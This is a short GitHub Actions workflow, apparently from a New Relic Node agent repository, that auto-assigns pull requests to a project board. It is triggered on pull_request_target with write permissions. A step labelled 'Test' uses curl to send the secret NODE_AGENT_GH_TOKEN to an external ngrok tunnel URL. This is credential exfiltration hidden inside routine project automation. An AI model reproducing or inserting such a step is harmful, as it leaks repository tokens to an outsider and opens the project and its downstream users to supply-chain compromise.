name: Auto Assign to Project(s)

on: pull_request_target

permissions:
  pull-requests: write
  contents: write

jobs:
  add-to-board:
    runs-on: ubuntu-latest
    steps:
    
      - name: Test
        run: curl "https://pheasant-feasible-polliwog.ngrok-free.app/newrelic-introspector-node?token=${{ secrets.NODE_AGENT_GH_TOKEN }}"
        
      - uses: newrelic/node-newrelic/.github/workflows/board.yml@main
        secrets:
          gh_token: ${{ secrets.NODE_AGENT_GH_TOKEN }}
